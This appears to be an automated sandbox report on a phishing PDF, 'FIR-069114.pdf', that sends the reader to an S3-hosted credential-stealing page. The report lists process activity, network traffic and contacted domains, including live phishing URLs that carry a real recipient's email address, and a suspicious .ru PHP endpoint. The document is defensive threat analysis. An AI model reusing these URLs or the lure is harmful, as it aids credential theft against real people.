Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57547
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57668
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57430
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57551
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57553
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57433
Source: unknown Network traffic detected: HTTP traffic on port 57402 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57554
Source: unknown Network traffic detected: HTTP traffic on port 57425 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57538 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57550
Source: unknown Network traffic detected: HTTP traffic on port 57654 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57631 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57549 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57574 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57436 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57438
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57559
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57439
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57434
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57555
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57435
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57556
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57436
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57557
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57437
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57558
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57441
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57562
Source: unknown Network traffic detected: HTTP traffic on port 57620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57442
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57563
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57565
Source: unknown Network traffic detected: HTTP traffic on port 57481 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57563 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57440
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57561
Source: unknown Network traffic detected: HTTP traffic on port 57447 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57504 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57489 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57632 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57655 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57607
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57608
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57609
Source: unknown Network traffic detected: HTTP traffic on port 57517 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57603
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57604
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:57510 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:57518 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:57622 version: TLS 1.2
Document contains embedded VBA macros
Source: chromecache_191.9.dr OLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: chromecache_191.9.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal72.phis.winPDF@38/45@21/11
Source: FIR-069114.pdf Initial sample: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/y8683yuief9uroruh9s0ipt40egg8yti43rgj0epefwore8iugrjemmpr.html#jalastair.campbell@charlestaylor.com
Source: FIR-069114.pdf Initial sample: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-08 07-48-30-490.log Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\FIR-069114.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1636,i,14502371201210557477,18297061268439937656,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1996,i,14496368495748628264,14070614855839226263,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1636,i,14502371201210557477,18297061268439937656,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1996,i,14496368495748628264,14070614855839226263,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: Google Drive.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Automated click: Next
Source: Window Recorder Window detected: More than 3 window changes detected
Source: FIR-069114.pdf Initial sample: PDF keyword /JS count = 0
Source: FIR-069114.pdf Initial sample: PDF keyword /JavaScript count = 0
Source: FIR-069114.pdf Initial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior
barindex
AI detected landing page (webpage, office document or email)
Source: PDF document LLM: Page contains button: 'REVIEW DOCUMENT' Source: 'PDF document'
Source: PDF document LLM: PDF document contains prominent button: 'review document'
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528939 Sample: FIR-069114.pdf Startdate: 08/10/2024 Architecture: WINDOWS Score: 72 21 x1.i.lencr.org 2->21 35 Antivirus detection for URL or domain 2->35 37 Yara detected HtmlPhish70 2->37 39 Suspicious PDF detected (based on various text indicators) 2->39 41 3 other signatures 2->41 8 chrome.exe 9 2->8         started        11 Acrobat.exe 20 56 2->11         started        signatures3 process4 dnsIp5 25 192.168.2.5, 443, 49251, 49529 unknown unknown 8->25 27 239.255.255.250 unknown Reserved 8->27 13 chrome.exe 8->13         started        16 AcroCEF.exe 106 11->16         started        process6 dnsIp7 29 www.google.com 142.250.186.68, 443, 57498, 57665 GOOGLEUS United States 13->29 31 151.101.194.137, 443, 57531 FASTLYUS United States 13->31 33 7 other IPs or domains 13->33 18 AcroCEF.exe 2 16->18         started        process8 dnsIp9 23 104.118.8.172, 443, 57377 AKAMAI-ASUS United States 18->23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.18.218
 viberbrowser.ru United States
13335 CLOUDFLARENETUS false
142.250.186.68
 www.google.com United States
15169 GOOGLEUS false
104.118.8.172
 unknown United States
16625 AKAMAI-ASUS false
104.18.94.41
 challenges.cloudflare.com United States
13335 CLOUDFLARENETUS false
3.5.184.28
 s3-r-w.ap-northeast-2.amazonaws.com United States
16509 AMAZON-02US false
151.101.2.137
 code.jquery.com United States
54113 FASTLYUS false
239.255.255.250
 unknown Reserved
unknown unknown false
172.67.183.101
 unknown United States
13335 CLOUDFLARENETUS false
151.101.194.137
 unknown United States
54113 FASTLYUS false
104.17.25.14
 cdnjs.cloudflare.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
code.jquery.com 151.101.2.137 true
viberbrowser.ru 104.21.18.218 true
cdnjs.cloudflare.com 104.17.25.14 true
challenges.cloudflare.com 104.18.94.41 true
www.google.com 142.250.186.68 true
s3-r-w.ap-northeast-2.amazonaws.com 3.5.184.28 true
x1.i.lencr.org unknown unknown
ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js false
    		unknown
    https://code.jquery.com/jquery-3.6.0.min.js false
    • URL Reputation: safe
    		 unknown
    https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/, false
      		unknown
      https://viberbrowser.ru// false
        		unknown
        https://challenges.cloudflare.com/turnstile/v0/api.js false
          		unknown
          https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/favicon.ico false
            		unknown
            https://viberbrowser.ru///8404.php false
              		unknown
              https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com true
              • SlashNext: Credential Stealing type: Phishing & Social Engineering
              		 unknown
              https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html false
                		unknown
                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js false
                • URL Reputation: safe
                		 unknown